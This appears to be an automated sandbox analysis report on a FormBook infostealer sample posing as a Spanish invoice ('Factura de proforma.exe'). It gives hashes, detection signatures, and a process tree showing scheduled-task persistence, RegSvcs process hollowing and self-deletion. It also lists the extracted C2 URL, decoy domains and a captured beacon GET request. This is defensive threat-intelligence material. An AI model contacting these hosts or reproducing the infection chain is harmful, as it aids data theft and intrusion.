Windows Analysis Report Factura de proforma.exe

Overview

General Information

Sample Name: Factura de proforma.exe
Analysis ID: 502357
MD5: 16f7045eebb451234ca8078222c5994c
SHA1: 99e8f263f9e34ad13cb8cd6af1bb816deffb5bde
SHA256: ff344e635b268090aafdb8fa830e76c41f34d7cf9a9bf03ed4ede2705008bfef
Tags: ESP, exe, geo

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Factura de proforma.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\Factura de proforma.exe' MD5: 16F7045EEBB451234CA8078222C5994C)
    • schtasks.exe (PID: 6436 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6388 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4716 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3408 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thefanlounge.com/cb3b/"], "decoy": ["listenlocker.com", "jumpstartnotarybiz.com", "new-post-vehicle-site.xyz", "summon-entertainment.com", "johnandtracy-adopt.com", "bferety.info", "palmonlae.space", "yx1889.com", "janetnaufranck.com", "banditanalytics.com", "agenciahologram.com", "artemojo.com", "goldensuninn.com", "aminobalm.com", "customersme.com", "techcareerschool.com", "angelahuckeby.com", "smoothcontract.com", "kartsorgumerkezi.com", "houstonhemorrhoidclinic.com", "istanbuloz.com", "buyrealestatewithcarlos.com", "onlinelivehds.xyz", "outstandingearth.com", "cyclingsunglassestop.com", "haras-dors.com", "zhuanyekf.com", "pps-squad.com", "highlovely.com", "hudsonvalleymomandpopshop.com", "graytielaw.com", "orang-gilakali.com", "sajaasboutique.com", "nwomakrom.com", "mobilne-kucice.com", "instant-geek.com", "brewinginthenameof.com", "shopstel.net", "alumaber.com", "fernoost.info", "expandablepocketdeals.com", "ritelard.net", "elderyochanan.com", "gofante.online", "americansforbrazil.com", "condosofcolor.com", "the2gaku.com", "mesegeka.com", "democratsforesteban.com", "vinoporfavor.com", "xwaxxc1.com", "jinhongtextile.com", "festival-du-chanvre.com", "abrasivburada.com", "pinhoti.net", "nestd.online", "fendlercart.com", "unanox.com", "boyscout-site.com", "wlctrade.com", "gudesigns.net", "jandmisia.com", "funnyp0sts.com", "laveudelamare.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      6.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      6.2.RegSvcs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      6.2.RegSvcs.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      0.2.Factura de proforma.exe.2bd16b0.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
      0.2.Factura de proforma.exe.3cc0560.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

            Sigma Overview

            System Summary:

            Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
            Source: Process started, Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard, Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Factura de proforma.exe' , ParentImage: C:\Users\user\Desktop\Factura de proforma.exe, ParentProcessId: 6952, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6388
            Sigma detected: Possible Applocker Bypass
            Source: Process started, Author: juju4, Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Factura de proforma.exe' , ParentImage: C:\Users\user\Desktop\Factura de proforma.exe, ParentProcessId: 6952, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6388

            Jbx Signature Overview

            AV Detection:

            Found malware configuration
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
            Yara detected FormBook
            Source: Yara match, File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY
            Source: 6.2.RegSvcs.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: Factura de proforma.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Factura de proforma.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: Binary string: RegSvcs.pdb, source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cscript.exe
            Source: Binary string: RegSvcs.pdb source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: cscript.pdb source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop edi, 6_2_00416CEC

            Networking:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe, Domain query: www.aminobalm.com
            Source: C:\Windows\explorer.exe, Domain query: www.palmonlae.space
            Source: C:\Windows\explorer.exe, Network Connect: 13.209.99.177 80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.new-post-vehicle-site.xyz
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractor, URLs: www.thefanlounge.com/cb3b/
            Source: Joe Sandbox View, ASN Name: AMAZON-02US AMAZON-02US
            Source: global traffic, HTTP traffic detected: GET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1 Host: www.aminobalm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: cscript.exe, 0000000A.00000002.573092724.00000000051DF000.00000004.00020000.sdmp, String found in binary or memory: https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkx
            Source: unknown, DNS traffic detected: queries for: www.palmonlae.space

            E-Banking Fraud:

            Yara detected FormBook

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 015EB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 047EB150 appears 32 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A360 NtCreateFile,6_2_0041A360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A410 NtReadFile,6_2_0041A410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A490 NtClose,6_2_0041A490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,6_2_0041A540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A35A NtCreateFile,6_2_0041A35A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A53A NtAllocateVirtualMemory,6_2_0041A53A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01629910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016299A0 NtCreateSection,LdrInitializeThunk,6_2_016299A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629860 NtQuerySystemInformation,LdrInitializeThunk,6_2_01629860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629840 NtDelayExecution,LdrInitializeThunk,6_2_01629840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016298F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_016298F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A50 NtCreateFile,LdrInitializeThunk,6_2_01629A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A20 NtResumeThread,LdrInitializeThunk,6_2_01629A20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_01629A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629540 NtReadFile,LdrInitializeThunk,6_2_01629540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016295D0 NtClose,LdrInitializeThunk,6_2_016295D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629710 NtQueryInformationToken,LdrInitializeThunk,6_2_01629710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016297A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_016297A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629780 NtMapViewOfSection,LdrInitializeThunk,6_2_01629780
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01629660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016296E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_016296E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629950 NtQueueApcThread,6_2_01629950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016299D0 NtCreateProcessEx,6_2_016299D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162B040 NtSuspendThread,6_2_0162B040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629820 NtEnumerateKey,6_2_01629820
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016298A0 NtWriteVirtualMemory,6_2_016298A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629B00 NtSetValueKey,6_2_01629B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162A3B0 NtGetContextThread,6_2_0162A3B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A10 NtQuerySection,6_2_01629A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A80 NtOpenDirectoryObject,6_2_01629A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629560 NtWriteFile,6_2_01629560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629520 NtWaitForSingleObject,6_2_01629520
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162AD30 NtSetContextThread,6_2_0162AD30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016295F0 NtQueryInformationFile,6_2_016295F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629760 NtOpenProcess,6_2_01629760
